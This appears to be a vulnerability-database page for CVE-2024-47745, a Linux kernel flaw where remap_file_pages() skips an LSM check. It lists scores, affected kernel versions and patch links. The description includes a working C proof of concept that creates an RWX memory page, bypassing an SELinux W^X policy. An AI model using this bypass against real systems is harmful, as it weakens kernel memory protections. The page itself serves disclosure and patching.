CVE-2024-47745

mm: call the security_mmap_file() LSM hook in remap_file_pages()

HIGH
7.8
CVSS Score
Published: October 21, 2024 at 12:14 PM UTC
Updated: August 5, 2026 at 12:04 PM UTC
2 products affected across 2 vendorsLinux KernelDebian Linux

Using Linux by Linux?

Get instant alerts when new vulnerabilities affect Linux - before attackers find them.

Real-time alertsTrack your software stackFree plan available
Severity
HIGH7.8
Exploit prediction
EPSS 0.3%
SSVC
No known exploit

Description

In the Linux kernel, the following vulnerability has been resolved: mm: call the security_mmap_file() LSM hook in remap_file_pages() The remap_file_pages syscall handler calls do_mmap() directly, which doesn't contain the LSM security check. And if the process has called personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for RW pages, this will actually result in remapping the pages to RWX, bypassing a W^X policy enforced by SELinux. So we should check prot by security_mmap_file LSM hook in the remap_file_pages syscall handler before do_mmap() is called. Otherwise, it potentially permits an attacker to bypass a W^X policy enforced by SELinux. The bypass is similar to CVE-2016-10044, which bypass the same thing via AIO and can be found in [1]. The PoC: $ cat > test.c int main(void) { size_t pagesz = sysconf(_SC_PAGE_SIZE); int mfd = syscall(SYS_memfd_create, "test", 0); const char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE, MAP_SHARED, mfd, 0); unsigned int old = syscall(SYS_personality, 0xffffffff); syscall(SYS_personality, READ_IMPLIES_EXEC | old); syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0); syscall(SYS_personality, old); // show the RWX page exists even if W^X policy is enforced int fd = open("/proc/self/maps", O_RDONLY); unsigned char buf2[1024]; while (1) { int ret = read(fd, buf2, 1024); if (ret <= 0) break; write(1, buf2, ret); } close(fd); } $ gcc test.c -o test $ ./test | grep rwx 7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted) [PM: subject line tweaks]

Affected

Our own answer: ranges merged, affected separated from platform-only, with confidence and review flags.

v ≥ 3.16.59v < 6.1.1203.16.59 ≤ v < 3.174.0 ≤ v < 6.1.1204.0 ≤ v < 6.10.134.0 ≤ v < 6.11.24.0 ≤ v < 6.124.0 ≤ v < 6.6.546.11 ≤ v < 6.11.26.2 ≤ v < 6.6.546.7 ≤ v < 6.10.133.16.594.097f98edde717ce9f217d8a285fe357dcd29fd1c8d78c1823f46519473949d33f0d1d33fe21ea16
Vendor states this is fixed in 0f910dbf2f2a4a7820ba4bac7b280f7108aa05b1 (fixed)
Vendor states this is fixed in 3393fddbfa947c8e1fdcc4509226905ffffd8b89 (fixed)
Vendor states this is fixed in 49d3a4ad57c57227c3b0fd6cd4188b2a5ebd6178 (fixed)
Vendor states this is fixed in ce14f38d6ee9e88e37ec28427b4b93a7c33c70d3 (fixed)
Vendor states this is fixed in ea7e2d5e49c05e5db1922387b09ca74aa40f46e2 (fixed)
Affected range stops below 3.17, so it looks safe — our inference, not a vendor statement
Vendor states this is fixed in 4.0 (unaffected)
Vendor states this is fixed in 6.1.120 (unaffected)
Vendor states this is fixed in 6.10.13 (unaffected)
Vendor states this is fixed in 6.11.2 (unaffected)
Vendor states this is fixed in 6.12 (unaffected)
Vendor states this is fixed in 6.6.54 (unaffected)

References (6)

Patch
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67
https://git.kernel.org/stable/c/0f910dbf2f2a4a7820ba4bac7b280f7108aa05b1
Patch
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67
https://git.kernel.org/stable/c/3393fddbfa947c8e1fdcc4509226905ffffd8b89
Patch
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67
https://git.kernel.org/stable/c/49d3a4ad57c57227c3b0fd6cd4188b2a5ebd6178
Patch
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67
https://git.kernel.org/stable/c/ce14f38d6ee9e88e37ec28427b4b93a7c33c70d3
Patch
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67
https://git.kernel.org/stable/c/ea7e2d5e49c05e5db1922387b09ca74aa40f46e2
Mailing ListThird Party Advisory
Source: af854a3a-2127-422b-91ae-364da2661108
https://lists.debian.org/debian-lts-announce/2025/03/msg00001.html

SSVC — Action Prioritization

SSVCNo known exploitNot automatablePartial impact

SSVC signals action urgency (what to patch first), separate from CVSS which measures severity.

CVSS

7.8HIGHLinux
Vector?

Quick Info

StatusMODIFIED
CWE
CWE-670

Get alerted

Stop reading CVE feeds looking for your own stack

Track the products you run and VulnTracker tells you when a new CVE affects them — with what is known about fixing it, and nothing about the rest.

Free plan, no card